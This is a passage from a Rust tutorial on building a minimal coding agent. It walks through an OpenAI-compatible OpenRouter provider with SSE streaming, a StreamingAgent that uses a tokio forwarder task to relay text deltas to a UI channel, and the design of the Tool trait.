- `test_streaming_accumulator_tool_call` -- feeds a `ToolCallStart` and two `ToolCallDelta` fragments, verifies they reassemble into a valid `ToolCall` with parsed JSON arguments
Everything else (test_openrouter_, test_streaming_streaming_agent_, test_streaming_stream_chat_) belongs to Chapter 5b.
Key takeaway
The provider layer decouples the agent from any specific LLM backend. MockProvider makes tests fast and deterministic; the StreamProvider trait pipes incremental events out on a channel while the method itself still returns a clean AssistantTurn; StreamAccumulator is the bridge that lets the UI see tokens as they arrive while the agent loop sees a complete message.
Everything in this chapter is testable without a network. Next up in Chapter 5b, we plug these primitives into a real HTTP provider and wire the events channel through the agent loop.
Check yourself
← Chapter 4: Messages & Types · Contents · Chapter 5b: OpenRouter & StreamingAgent →
Chapter 5b: OpenRouter & StreamingAgent
File(s) to edit:
src/providers/openrouter.rs,src/streaming.rs(theStreamingAgentblock at the bottom) Tests to run:cargo test -p mini-claw-code-starter test_openrouter_,cargo test -p mini-claw-code-starter test_streaming_streaming_agent_,cargo test -p mini-claw-code-starter test_streaming_stream_chat_Estimated time: 35 min
Goal
- Implement `OpenRouterProvider` so the agent can talk to a real OpenAI-compatible API -- both non-streaming and streaming.
- Implement `StreamingAgent::chat` -- the agent loop that forwards streaming text deltas to a UI channel while running tools.
Chapter 5a built the abstractions (Provider, StreamProvider, StreamEvent), the mocks (MockProvider, MockStreamProvider), and the parse/accumulate machinery (parse_sse_line, StreamAccumulator). This chapter plugs those pieces into a real HTTP provider and wires a streaming channel through the agent loop.
If anything below assumes `parse_sse_line` or `StreamAccumulator` exists, it's because you implemented them in 5a.
Sidebar: tokio concurrency for Go devs
If Go is your native async language, here is the translation table you need
before reading the streaming code. Everything in this chapter rests on these
five primitives; skip this box if you already think in tokio.
| Go | Tokio | Notes |
|---|---|---|
| `go func() { ... }()` | `tokio::spawn(async { ... })` | Both fire-and-forget. `tokio::spawn` returns a `JoinHandle` you can await later if you care about the result. |
| `ch := make(chan T, n)` | `let (tx, rx) = tokio::sync::mpsc::channel::<T>(n)` | Bounded channel. For an unbounded channel, use `mpsc::unbounded_channel()` -- analogous to a channel with an infinite buffer. |
| `ch <- v` | `tx.send(v).await` | Async send in Tokio (awaits when the buffer is full). The unbounded variant uses `tx.send(v)` with no `.await`. |
| `v, ok := <-ch` | `if let Some(v) = rx.recv().await { ... }` | `recv` returns `None` when all senders are dropped (equivalent to `close(ch)` + drain). |
| `close(ch)` | drop every `tx` clone | Tokio has no explicit close. When the last sender is dropped, receivers see `None` and loops exit. |
| `wg.Add(1); wg.Wait()` | `handle.await` (or `tokio::join!`, `try_join!`) | A `JoinHandle` is like a single-goroutine `WaitGroup`. Multiple handles: `tokio::join!(h1, h2)` runs them concurrently. |
| `select { case <-a: case <-b: }` | `tokio::select! { _ = a => ..., _ = b => ... }` | Direct analogue. Branches are polled in random order unless you add `biased;`. |
One non-obvious point specific to this chapter: we signal "the stream is
over" by dropping the sender. There is no explicit close call. The receiver
task observes `rx.recv().await == None` and exits its loop. If you forget to
drop the sender (for example by holding it inside an `Arc` that outlives the
producer), the receiver hangs forever -- this is one of the deadlock
patterns that §"Why not just rx.recv() in the main loop?" walks through.
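The drop-to-close rule is easiest to see in miniature with `std`'s blocking channel, which follows the same convention as `tokio::sync::mpsc`. This is a std-only sketch (no tokio); `produce_and_drain` is a name invented for the example:

```rust
use std::sync::mpsc;
use std::thread;

// Drop-based termination: there is no close() call. When every sender is
// dropped, the receiver's recv() starts failing and its loop exits --
// the same rule tokio's mpsc follows when recv().await returns None.
fn produce_and_drain() -> Vec<u32> {
    let (tx, rx) = mpsc::channel::<u32>();

    let consumer = thread::spawn(move || {
        let mut seen = Vec::new();
        while let Ok(v) = rx.recv() {
            seen.push(v);
        }
        seen // reached only after the last sender is dropped
    });

    for i in 0..3 {
        tx.send(i).unwrap();
    }
    drop(tx); // the "close": the consumer's while-let now terminates

    consumer.join().unwrap()
}

fn main() {
    assert_eq!(produce_and_drain(), vec![0, 1, 2]);
}
```

Comment out the `drop(tx)` line and `join()` never returns — the blocking analogue of the hung-receiver deadlock described above.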
OpenRouterProvider
With the parsing infrastructure in place, we can build the real provider. It targets the OpenRouter API, which is OpenAI-compatible — the same request/response format works with OpenAI, Together, Groq, and many others.
API types
The provider needs serde types for the request and response payloads. Here is the request side:
```rust
#[derive(Serialize)]
struct ChatRequest<'a> {
    model: &'a str,
    messages: Vec<ApiMessage>,
    #[serde(skip_serializing_if = "Vec::is_empty")]
    tools: Vec<ApiTool>,
    #[serde(skip_serializing_if = "std::ops::Not::not")]
    stream: bool,
}
```
The `skip_serializing_if` annotations keep the JSON clean — `tools` is omitted when empty (some models choke on an empty array), and `stream` is omitted when false (the default for the API).
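Concretely, a request with no tools and streaming off serialises to just the two remaining fields (the model string below is a placeholder, not a real model name):

```json
{
  "model": "some/model-name",
  "messages": [
    { "role": "user", "content": "hi" }
  ]
}
```

With tools registered and `stream: true`, both skipped fields appear alongside `model` and `messages`.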
`ApiMessage`, `ApiToolCall`, `ApiFunction`, `ApiTool`, and `ApiToolDef` mirror the OpenAI message format. The response types (`ChatResponse`, `Choice`, `ResponseMessage`) deserialize the non-streaming response. The chunk types (`ChunkResponse`, `ChunkChoice`, `Delta`, `DeltaToolCall`, `DeltaFunction`) deserialize the streaming response — you already implemented those in 5a for `parse_sse_line`.
Conversion helpers
Two impl methods on `OpenRouterProvider` translate between our internal
types and the API format. `convert_messages` handles the four `Message`
variants:
```rust
pub(crate) fn convert_messages(messages: &[Message]) -> Vec<ApiMessage> {
    let mut out = Vec::new();
    for msg in messages {
        match msg {
            Message::System(text) => out.push(ApiMessage {
                role: "system".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::User(text) => out.push(ApiMessage {
                role: "user".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::Assistant(turn) => out.push(ApiMessage {
                role: "assistant".into(),
                content: turn.text.clone(),
                tool_calls: if turn.tool_calls.is_empty() {
                    None
                } else {
                    Some(
                        turn.tool_calls
                            .iter()
                            .map(|c| ApiToolCall {
                                id: c.id.clone(),
                                type_: "function".into(),
                                function: ApiFunction {
                                    name: c.name.clone(),
                                    arguments: c.arguments.to_string(),
                                },
                            })
                            .collect(),
                    )
                },
                tool_call_id: None,
            }),
            Message::ToolResult { id, content } => out.push(ApiMessage {
                role: "tool".into(),
                content: Some(content.clone()),
                tool_calls: None,
                tool_call_id: Some(id.clone()),
            }),
        }
    }
    out
}
```
Four details worth pausing on:
- `System` and `User` are symmetric. Same shape, different role string. Everything else (`tool_calls`, `tool_call_id`) is `None`.
- `Assistant` is the variant with the nuance. The `text` field maps directly to `content`, but the tool calls have to be reserialised. `c.arguments` is a `serde_json::Value`; the OpenAI API wants it as a JSON string, so we call `.to_string()` to turn the `Value` back into text. Emitting an empty `tool_calls: []` array makes some providers reject the request as malformed, so we send `None` instead.
- `ToolResult` becomes `role: "tool"`. This is the variant that ties a result back to its originating call via `tool_call_id`. Without that id the provider cannot associate the result with the call, and the next response is usually an error.
- No default branch. Every `Message` variant is handled explicitly. If you add a new variant in Chapter 4, the match will fail to compile here until you decide how it should serialise — which is the behaviour we want.
`convert_tools` is simpler: wrap each `ToolDefinition` in the OpenAI
function-calling envelope.
```rust
pub(crate) fn convert_tools(tools: &[&ToolDefinition]) -> Vec<ApiTool> {
    tools
        .iter()
        .map(|t| ApiTool {
            type_: "function",
            function: ApiToolDef {
                name: t.name,
                description: t.description,
                parameters: t.parameters.clone(),
            },
        })
        .collect()
}
```
The envelope is a fixed shape: { "type": "function", "function": { name, description, parameters } }. Every OpenAI-compatible provider expects
exactly this, and our ToolDefinition was designed in Ch4 specifically
so this mapping is a one-liner.
The provider struct
```rust
pub struct OpenRouterProvider {
    client: reqwest::Client,
    api_key: String,
    model: String,
    base_url: String,
}
```
The struct holds a reusable `reqwest::Client`, the API key, model name, and base URL. Constructors include `new(api_key, model)` for explicit creation, `from_env()`, which loads `OPENROUTER_API_KEY` via dotenvy, and a `base_url(self, url)` builder method for overriding the endpoint (useful for local testing or alternative providers).
Non-streaming Provider impl
The non-streaming path is the simpler one: one POST, one JSON response, one
AssistantTurn returned. Here it is end to end:
```rust
impl Provider for OpenRouterProvider {
    async fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: false,
        };

        let resp: ChatResponse = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?
            .json()
            .await
            .context("failed to parse response")?;

        let choice = resp.choices.into_iter().next().context("no choices")?;

        let tool_calls = choice
            .message
            .tool_calls
            .unwrap_or_default()
            .into_iter()
            .map(|tc| {
                let arguments =
                    serde_json::from_str(&tc.function.arguments).unwrap_or(Value::Null);
                ToolCall {
                    id: tc.id,
                    name: tc.function.name,
                    arguments,
                }
            })
            .collect();

        let stop_reason = match choice.finish_reason.as_deref() {
            Some("tool_calls") => StopReason::ToolUse,
            _ => StopReason::Stop,
        };

        let usage = resp.usage.map(|u| TokenUsage {
            input_tokens: u.prompt_tokens.unwrap_or(0),
            output_tokens: u.completion_tokens.unwrap_or(0),
        });

        Ok(AssistantTurn {
            text: choice.message.content,
            tool_calls,
            stop_reason,
            usage,
        })
    }
}
```
Three decisions to notice:
- `error_for_status()` turns HTTP 4xx/5xx into an `Err`. Otherwise a 403 from OpenRouter would deserialize whatever body came back as if it were a `ChatResponse` and fail confusingly later.
- Tool-call arguments arrive as a JSON string, not a `Value`. The OpenAI spec puts `"arguments": "{\"path\":\"foo.rs\"}"` in the wire format. We parse it back into a `Value` ourselves; on a parse failure we fall back to `Value::Null` so a malformed `arguments` field does not abort the whole turn.
- `stop_reason` is a straight mapping of `finish_reason`. Only `"tool_calls"` becomes `ToolUse`; everything else (`"stop"`, `"length"`, null, missing) becomes `Stop`. This matches the "the model decides" story from Chapter 3's aside -- we are just translating the model's own stop signal.
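The last mapping is small enough to sketch standalone. `StopReason` mirrors the starter's enum; `map_finish_reason` is a free function invented for this illustration, not part of the codebase:

```rust
// Illustrative, std-only sketch of the finish_reason -> StopReason mapping.
#[derive(Debug, PartialEq)]
enum StopReason {
    Stop,
    ToolUse,
}

fn map_finish_reason(finish: Option<&str>) -> StopReason {
    match finish {
        Some("tool_calls") => StopReason::ToolUse,
        // "stop", "length", unknown strings, and a missing field all
        // collapse into Stop -- the model simply ended its turn.
        _ => StopReason::Stop,
    }
}

fn main() {
    assert_eq!(map_finish_reason(Some("tool_calls")), StopReason::ToolUse);
    assert_eq!(map_finish_reason(Some("stop")), StopReason::Stop);
    assert_eq!(map_finish_reason(Some("length")), StopReason::Stop);
    assert_eq!(map_finish_reason(None), StopReason::Stop);
}
```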
Streaming StreamProvider impl
The streaming path is the same request shape with stream: true, but
instead of a single JSON body we read a chunked HTTP response and parse
it as Server-Sent Events. Here is the complete impl:
```rust
impl crate::streaming::StreamProvider for OpenRouterProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: tokio::sync::mpsc::UnboundedSender<crate::streaming::StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        use crate::streaming::{StreamAccumulator, parse_sse_line};

        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: true,
        };

        let mut resp = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?;

        let mut acc = StreamAccumulator::new();
        let mut buffer = String::new();

        while let Some(chunk) = resp.chunk().await.context("failed to read chunk")? {
            buffer.push_str(&String::from_utf8_lossy(&chunk));
            while let Some(newline_pos) = buffer.find('\n') {
                let line = buffer[..newline_pos].trim_end_matches('\r').to_string();
                buffer = buffer[newline_pos + 1..].to_string();
                if line.is_empty() {
                    continue;
                }
                if let Some(events) = parse_sse_line(&line) {
                    for event in events {
                        acc.feed(&event);
                        let _ = tx.send(event);
                    }
                }
            }
        }

        Ok(acc.finish())
    }
}
```
Walk through it:
- Same request, but `stream: true`. The API returns a chunked HTTP response instead of a single JSON body. The request construction and auth are identical to the non-streaming path; this is exactly what we want from an abstraction called "streaming".
- Read raw byte chunks. `resp.chunk()` returns `Option<Bytes>` — the HTTP body arrives in arbitrary-sized pieces that do not align with SSE event boundaries. A single chunk could be a partial line, several lines, or multiple events crammed together.
- Buffer and split on newlines. TCP chunks can split an SSE line in the middle. The `buffer` accumulates raw text, and the inner `while` loop extracts complete lines. This is classic line-oriented protocol parsing — you accumulate bytes and consume lines as they become available. Notice the inner loop keeps going until no more complete lines remain in the buffer, then we wait for the next chunk.
- Parse each line. `parse_sse_line` (from 5a) converts a `data:` line into `StreamEvent`s. Blank lines (SSE event separators) and non-data lines (comments, keep-alives) return `None` and are skipped.
- Feed both the accumulator and the channel. For every event, the accumulator updates its internal state (building the eventual `AssistantTurn`) and the channel delivers the same event to the UI in real time. The `let _ = tx.send(event)` deliberately discards a send error: if the receiver has been dropped (e.g. the forwarder task has exited because the main loop cancelled), we still want to finish consuming the stream so the underlying HTTP connection can be cleanly released.
- Return the assembled message. Once the stream ends (`resp.chunk()` returns `None`), the accumulator has collected everything, and `finish()` produces the final `AssistantTurn`. At this point `tx` is dropped (the function is returning), which closes the channel and signals the forwarder task to exit — exactly the termination flow the `StreamingAgent` section below depends on.
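The buffer-and-split step is worth isolating, since it is pure string manipulation. Here is the same logic over `std` types only — `drain_lines` is a name invented for this sketch; the provider inlines the loop:

```rust
/// Extract complete lines from a growing buffer, mirroring the inner
/// `while let Some(newline_pos) = buffer.find('\n')` loop above.
/// Handles `\r\n` endings and skips blank lines (SSE separators).
fn drain_lines(buffer: &mut String) -> Vec<String> {
    let mut lines = Vec::new();
    while let Some(pos) = buffer.find('\n') {
        let line = buffer[..pos].trim_end_matches('\r').to_string();
        *buffer = buffer[pos + 1..].to_string();
        if !line.is_empty() {
            lines.push(line);
        }
    }
    lines
}

fn main() {
    let mut buf = String::new();
    // Chunk boundaries do not align with SSE lines:
    buf.push_str("data: {\"a\":1}\r\ndata: {\"b\"");
    assert_eq!(drain_lines(&mut buf), vec!["data: {\"a\":1}"]);
    // The partial line stays buffered until the next chunk completes it.
    buf.push_str(":2}\n\n");
    assert_eq!(drain_lines(&mut buf), vec!["data: {\"b\":2}"]);
    assert!(buf.is_empty());
}
```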
This dual-path design (accumulator + channel) is how Claude Code handles streaming too. The UI renders tokens as they arrive, but the agent loop sees a clean, complete response — no bespoke partial-state handling.
Your task
The OpenRouterProvider lives in src/providers/openrouter.rs. Fill in the constructor, conversion helpers, the Provider impl, and the StreamProvider impl. The required dependencies (reqwest, dotenvy) are already in Cargo.toml.
StreamingAgent
With streaming working at the provider level, we need an agent loop that benefits from it. Streaming an LLM reply out of the provider is only useful if the text reaches the user's terminal as it arrives. That wiring is `StreamingAgent`.
StreamingAgent is the streaming counterpart of SimpleAgent from Chapter 3:
- `SimpleAgent::chat` calls `provider.chat()` and returns a complete `AssistantTurn`.
- `StreamingAgent::chat` calls `provider.stream_chat()`, forwards text deltas to a UI channel while the LLM is still generating, and then returns the assembled response once the stream finishes.
The struct and builder look identical to SimpleAgent:
```rust
pub struct StreamingAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
}

impl<P: StreamProvider> StreamingAgent<P> {
    pub fn new(provider: P) -> Self {
        Self { provider, tools: ToolSet::new() }
    }

    pub fn tool(mut self, t: impl Tool + 'static) -> Self {
        self.tools.push(t);
        self
    }

    pub async fn run(
        &self,
        prompt: &str,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> {
        let mut messages = vec![Message::User(prompt.to_string())];
        self.chat(&mut messages, events).await
    }

    pub async fn chat(
        &self,
        messages: &mut Vec<Message>,
        events: mpsc::UnboundedSender<AgentEvent>,
    ) -> anyhow::Result<String> {
        /* ... */
    }
}
```
`run()` is a thin wrapper around `chat()`. The real work happens in `chat()`, and it is this chapter's most subtle piece of code.
The two channels, and the problem they solve
StreamingAgent::chat sits between two channels that speak different vocabularies:
- Downstream (provider → agent): the provider speaks `StreamEvent` — raw stream fragments including `TextDelta`, `ToolCallStart`, `ToolCallDelta`, and `Done`. All the low-level grammar of a streaming LLM response.
- Upstream (agent → UI): the UI wants `AgentEvent` — agent-level notifications: `TextDelta` for displayable text, `ToolCall` when a tool starts running, `Done` when the whole conversation finishes, `Error` if something blows up.
StreamingAgent::chat is the translator. It has to:
1. Hand the provider a `StreamEvent` channel so the provider can send deltas into it.
2. Concurrently pull from that channel, filter `TextDelta`s, and re-emit them as `AgentEvent::TextDelta` on the UI channel — all while the provider is still generating.
3. Wait for the provider to return the assembled `AssistantTurn`.
4. Decide: if the turn ended in `Stop`, emit `AgentEvent::Done` and return; if it ended in `ToolUse`, emit a `ToolCall` event per call, run the tools, append results, and loop.
The critical word is concurrently in step 2. We cannot `recv()` events after `stream_chat` returns — by then the generation is over and the UI has been waiting on a frozen screen. We need a separate task pulling from the stream channel while the provider is still writing into it.
The forwarder-task pattern
Here is the full chat() implementation:
```rust
pub async fn chat(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    let defs = self.tools.definitions();
    loop {
        // 1. Fresh stream channel for this turn.
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();

        // 2. Spawn a forwarder task: drain stream_rx, relay TextDeltas to `events`.
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text));
                }
            }
        });

        // 3. Kick off generation. The provider writes StreamEvents into stream_tx.
        //    Dropping stream_tx here would close the channel early — so we pass it by value.
        let turn = match self.provider.stream_chat(messages, &defs, stream_tx).await {
            Ok(t) => t,
            Err(e) => {
                let _ = events.send(AgentEvent::Error(e.to_string()));
                return Err(e);
            }
        };

        // 4. stream_chat has returned → stream_tx was dropped → forwarder sees
        //    stream_rx closed → forwarder exits. Await it to propagate any panic
        //    and ensure all deltas are flushed before we emit downstream events.
        let _ = forwarder.await;

        // 5. Now handle the assembled turn: stop or another tool round.
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let mut results = Vec::with_capacity(turn.tool_calls.len());
                for call in &turn.tool_calls {
                    let _ = events.send(AgentEvent::ToolCall {
                        name: call.name.clone(),
                        summary: tool_summary(call),
                    });
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t
                            .call(call.arguments.clone())
                            .await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }
                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
                // Loop: feed results back to the LLM.
            }
        }
    }
}
```
Step-by-step:
1. Fresh channel per loop iteration. A new `mpsc::unbounded_channel()` every turn. We cannot reuse one across tool rounds — dropping `stream_tx` is how the forwarder knows the turn is over (see step 4). If we kept the same channel, the forwarder would never exit.
2. Spawn the forwarder. `tokio::spawn` runs a task concurrently with the current one. The forwarder loops on `stream_rx.recv().await`, filtering `StreamEvent::TextDelta` into `AgentEvent::TextDelta`. Everything else is dropped — `ToolCallStart`/`ToolCallDelta`/`Done` don't show up in the UI as text. We clone the `events` sender before moving it into the task because we still need the original to send `ToolCall`/`Done`/`Error` after the forwarder exits.
3. Call `stream_chat` and wait. The provider is now writing `StreamEvent`s into `stream_tx`. The forwarder pulls them off as they arrive and relays text to the UI. Meanwhile the current task is blocked on the `stream_chat` future. Three tasks are making progress at once: the HTTP response reader, the forwarder, and (via the channel) the UI renderer.
4. Await the forwarder. When `stream_chat` returns, its local copy of `stream_tx` is dropped. That closes the channel, which makes `stream_rx.recv()` return `None`, which ends the forwarder's `while let` loop. Awaiting the `JoinHandle` does two things: it guarantees the forwarder has flushed every last delta to the UI before we move on, and it surfaces any panic the forwarder might have hit. Forgetting this `await` is the classic "last few tokens go missing" bug.
5. Dispatch on `stop_reason`. At this point we have a complete `AssistantTurn` and the UI has seen every `TextDelta`. If the model is done (`Stop`), we emit `AgentEvent::Done` and return. If it wants tools (`ToolUse`), we emit a `ToolCall` event per invocation (the UI uses these to show "[bash: ls]" spinners), run each tool with the same graceful-error pattern as `SimpleAgent`, append results to `messages`, and let the `loop` spin — which will spawn a fresh forwarder and `stream_chat` for the next turn.
Why not just rx.recv() in the main loop?
A single-task approach — "call `stream_chat`, then drain `rx`" — defeats the purpose and can deadlock. `stream_chat` does not return until the stream is fully consumed. With an unbounded channel, the provider keeps writing into a buffer nobody reads (technically fine, but nothing gets rendered until the end). With a bounded channel, the provider blocks on `tx.send().await`, which blocks `stream_chat`, which never returns — a true deadlock. Either way the UI sees no tokens until the turn is over — defeating the point of streaming.
The forwarder pattern decouples the two halves: the provider's writer side and the UI's reader side both make progress independently.
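You can feel the bounded-channel case with `std`'s `sync_channel`, where a full buffer blocks the sender outright. With a concurrent reader the producer never stalls; without one, the second `send` would block forever — the blocking analogue of the deadlock above. A sketch, not starter code (`sum_via_forwarder` is an invented name):

```rust
use std::sync::mpsc::sync_channel;
use std::thread;

// Capacity 1: send() blocks whenever the buffer is full. Draining only
// *after* all sends complete would deadlock on the second send -- the
// analogue of calling stream_chat and reading rx afterwards.
fn sum_via_forwarder() -> u32 {
    let (tx, rx) = sync_channel::<u32>(1);

    // The "forwarder": a concurrent reader that keeps the channel moving.
    let forwarder = thread::spawn(move || {
        let mut total = 0u32;
        while let Ok(v) = rx.recv() {
            total += v;
        }
        total
    });

    for i in 1..=100 {
        tx.send(i).unwrap(); // never stalls for long: the reader drains
    }
    drop(tx); // close the channel so the forwarder's loop exits

    forwarder.join().unwrap()
}

fn main() {
    assert_eq!(sum_via_forwarder(), 5050);
}
```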
The working pattern, end to end
Here is the same flow drawn once, after the deadlock is fixed. Four Rust
tasks, three edges that matter: the provider writes tx, the forwarder
pulls rx and re-emits onto events, and the main loop awaits on
stream_chat's return value for control flow. Termination is purely
drop-based: when stream_chat returns, it drops tx; rx.recv() then
yields None; the forwarder loop exits; handle.await unblocks.
```mermaid
sequenceDiagram
    participant M as Main loop
    participant F as Forwarder task
    participant P as stream_chat
    participant U as UI (events rx)
    M->>M: let (tx, rx) = mpsc::unbounded_channel::<StreamEvent>()
    M->>F: tokio::spawn(forwarder(rx, events))
    M->>P: provider.stream_chat(messages, tools, tx).await
    Note over P: holds the tx sender;<br/>writes events as they arrive
    P-->>F: tx.send(TextDelta) (many)
    F-->>U: events.send(AgentEvent::TextDelta)
    P-->>F: tx.send(ToolCallStart / Delta / Done)
    F-->>U: events.send(...)
    P-->>M: returns AssistantTurn (drops tx here)
    Note over F: rx.recv() now returns None,<br/>forwarder loop exits naturally
    F-->>M: JoinHandle resolves
    M->>M: match turn.stop_reason { Stop => ..., ToolUse => ... }
```
Three invariants keep this alive:
- The provider owns the sender. Only `stream_chat` holds a `tx` — the main loop hands it over and does not keep a clone. When `stream_chat` returns, the last `tx` is dropped, which closes the channel.
- The forwarder owns the receiver. It runs in its own spawned task so the receiver can make progress while `stream_chat` is still writing. No one else calls `rx.recv()`.
- The main loop awaits both. First `stream_chat`, then the forwarder's `JoinHandle`. Awaiting the handle is what prevents the main loop from leaking a half-finished forwarder into the next iteration of the agent loop.
If any one of these three breaks — a stray tx clone held by the main
loop, the forwarder running inline on the main task, or the main loop
skipping the handle await — you get a subtle variant of the deadlock
above. This is why the pattern is worth learning once and reaching for
any time you need streaming I/O bridged into a step-wise decision loop.
Your task
Fill in the `StreamingAgent::chat()` stub in `src/streaming.rs`. Use the four-step recipe: channel, forwarder, await `stream_chat`, await forwarder. Then the match on `stop_reason` is the same shape as `SimpleAgent::chat`.
Run the tests
```sh
cargo test -p mini-claw-code-starter test_openrouter_
cargo test -p mini-claw-code-starter test_streaming_streaming_agent_
cargo test -p mini-claw-code-starter test_streaming_stream_chat_
```
What these tests verify
`test_openrouter_` (OpenRouterProvider):

- `test_openrouter_convert_messages` — internal `Message` variants are converted to the correct OpenAI API format
- `test_openrouter_convert_tools` — `ToolDefinition` values are wrapped in the OpenAI function-calling envelope
`test_streaming_streaming_agent_` (StreamingAgent end-to-end against MockStreamProvider):

- `test_streaming_streaming_agent_text_response` — single-turn text response; UI channel sees at least one `TextDelta` and a `Done`
- `test_streaming_streaming_agent_tool_loop` — the agent runs a tool round and produces a final answer; UI channel sees a `ToolCall` event and a `Done`
- `test_streaming_streaming_agent_chat_history` — `chat()` appends the final assistant turn to the caller-provided `messages` vec
`test_streaming_stream_chat_` (OpenRouter streaming against a local TCP mock):

- `test_streaming_stream_chat_events_order` — a scripted SSE body is parsed into events in the correct order and the assembled `AssistantTurn` matches
Key takeaway
StreamingAgent is where everything from 5a pays off. The provider produces StreamEvents, the forwarder task translates them into UI-level AgentEvents as they arrive, and the main loop waits on the assembled AssistantTurn to decide what to do next. Tokens hit the terminal in real time; the agent loop still sees a clean, complete message — no special-casing for streaming vs non-streaming.
The pattern — "split a complex stream into two concurrent sides, bridged by a task" — is the same one Claude Code uses in its renderer. Once you've written it once, it shows up everywhere you need to mix streaming I/O with step-wise decision-making.
In Chapter 6 we turn from providers to tools — the other half of the agent's interface with the outside world.
Check yourself
← Chapter 5a: Provider & Streaming Foundations · Contents · Chapter 6: Tool Interface →
Chapter 6: Tool Interface
File(s) to edit: none — this chapter is a conceptual walkthrough of the
`Tool` trait. The hands-on `EchoTool` below is meant to be built from scratch in a scratch file (or tried in the Rust playground); the starter does not ship an `echo.rs` stub and the existing `test_read_*` tests from Chapter 2 are unaffected by anything you do here. Reading time: 25 min
Goal
- Understand why the `Tool` trait uses `#[async_trait]` (object safety for heterogeneous storage) while `Provider` uses RPITIT (zero-cost generics).
- Implement a concrete `EchoTool` that demonstrates the full tool lifecycle: schema definition, trait implementation, registration, and execution.
- Verify that `ToolSet` correctly registers tools and returns their definitions for the LLM.
In the last chapter we gave our agent a voice by connecting it to an LLM provider. But a model that can only produce text is like a programmer who can only talk about code without ever touching a keyboard. In this chapter we give the agent hands.
You already defined the tool types in Chapter 4 -- ToolDefinition, Tool trait, and ToolSet. In this chapter we will understand why those types are designed the way they are, explore the critical distinction between #[async_trait] and RPITIT, and then wire everything together by implementing your first concrete tool: an EchoTool.
Tool lifecycle
```mermaid
flowchart LR
    A[Tool::new] -->|stores| B[ToolDefinition]
    B -->|registered in| C[ToolSet]
    C -->|definitions sent to| D[LLM]
    D -->|responds with| E[ToolCall]
    E -->|dispatched via| C
    C -->|lookup by name| F[Tool::call]
    F -->|returns| G[String result]
    G -->|wrapped as| H[Message::ToolResult]
```
Design context: how Claude Code models tools
Claude Code's TypeScript codebase defines tools with a generic Tool<Input, Output, Progress> type. Each tool carries a Zod schema for input validation, returns rich structured output (sometimes including React elements for terminal rendering), and can emit progress events during long-running operations. There are over 40 tools in production, each with permission metadata, cost hints, and UI integration.
We are going to keep the shape but cut the ceremony. In our Rust version:
| Claude Code (TypeScript) | mini-claw-code-starter (Rust) |
|---|---|
| `Tool<Input, Output, Progress>` | `trait Tool` (no generics) |
| Zod schema for input | `serde_json::Value` + builder |
| Rich `ToolResult<T>` | `anyhow::Result<String>` |
| React-rendered progress | (not implemented) |
| 40+ tools with Zod validation | 5 tools with JSON schema |
| `isReadOnly`, `isDestructive`, etc. | (not implemented -- kept minimal) |
The key simplification: we drop the generic parameters and the safety/display methods. Claude Code needs <Input, Output, Progress> because each tool has a distinct strongly-typed input shape and renders different UI. We use serde_json::Value for input and String for output, which lets us store heterogeneous tools in a single collection without type erasure gymnastics.
Why two async trait styles? (#[async_trait] vs RPITIT)
This is the most important design decision in the type system, and it is worth understanding deeply. The same trade-off drives every async trait in this book -- Provider, Tool, StreamProvider, Hook, SafetyCheck. Read this section once; other chapters link back to it.
Look at the Provider trait from Chapter 4:
```rust
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
```
This uses RPITIT (return-position impl Trait in traits), a feature stabilized in Rust 1.75. The compiler generates a unique future type for each implementation. It is zero-cost and avoids boxing.
But RPITIT has a catch: it makes the trait non-object-safe. You cannot write Box<dyn Provider> because the compiler needs to know the concrete future type at compile time. That is fine for providers -- we use them as generic parameters (struct SimpleAgent<P: Provider>), so the concrete type is always known.
Tools are different. We need to store a heterogeneous collection of tools -- BashTool, ReadTool, WriteTool, all in one HashMap. That requires Box<dyn Tool>, which requires object safety. And object safety requires that async methods return a known type, not an opaque impl Future.
The #[async_trait] macro from the async-trait crate solves this by rewriting async fn call(...) into a method that returns Pin<Box<dyn Future<...> + Send + '_>>. The boxing has a small cost (one heap allocation per tool call), but tool calls involve I/O that dwarfs the allocation.
```text
Provider: generic param P    -> RPITIT         (zero-cost, not object-safe)
Tool:     stored in Box<dyn> -> #[async_trait] (boxed future, object-safe)
```
This split is a deliberate design choice. If Rust stabilizes dyn async fn in the future, we could drop async_trait entirely. Until then, the two-strategy approach gives us the best of both worlds.
